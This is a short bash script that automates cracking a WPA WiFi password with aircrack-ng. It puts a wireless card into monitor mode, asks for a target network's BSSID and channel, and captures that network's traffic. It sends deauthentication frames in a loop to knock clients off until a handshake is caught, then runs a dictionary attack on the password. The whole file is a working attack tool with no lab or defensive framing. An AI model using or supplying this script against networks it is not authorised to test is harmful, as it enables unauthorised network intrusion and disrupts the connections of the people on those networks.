#!/bin/bash

#dependencies
sudo apt-get install aircrack-ng -y
sudo apt install net-tools -y
clear

#select wifi interface
printf "Wifi interfaces availible:\n"
ifconfig | grep -o '^[^ :]*' | grep -o '^w.*'
printf "\nEnter WiFi interface name:\n"
read wifi_interface

#list all wifi networks
sudo airmon-ng start $wifi_interface
sudo airodump-ng ${wifi_interface}mon

#select target information
printf "\nEnter bssid of the targeted network\n"
read targeted_bssid
printf "\nEnter the channel of the targeted network\n"
read targeted_channel

#begin attack
sudo rm handshake-file*
sudo gnome-terminal -- /bin/bash -c "airodump-ng --bssid $targeted_bssid -c $targeted_channel -w handshake-file ${wifi_interface}mon"
sleep 1
printf "\n"

handshake="$(aircrack-ng handshake-file-01.cap | grep -o '([01].*)' | grep -o '[01]')"
while [ "$handshake" != "1" ]; do
	printf "Not found yet\n"
	sudo aireplay-ng --deauth 1 -a $targeted_bssid ${wifi_interface}mon --ignore-negative-one > /dev/null
	sleep 20
	handshake="$(aircrack-ng handshake-file-01.cap | grep -o '([01].*)' | grep -o '[01]')"
done
printf "\n##################\n"
printf "Handshake Found!!!\n"
printf "##################\n\n"

#re-enable wifi interface
sudo airmon-ng stop ${wifi_interface}mon > /dev/null

#try to decipher the password with a dictionary
printf "Enter dictionary file name:\n"
read DIC
sudo aircrack-ng handshake-file-01.cap -w $DIC
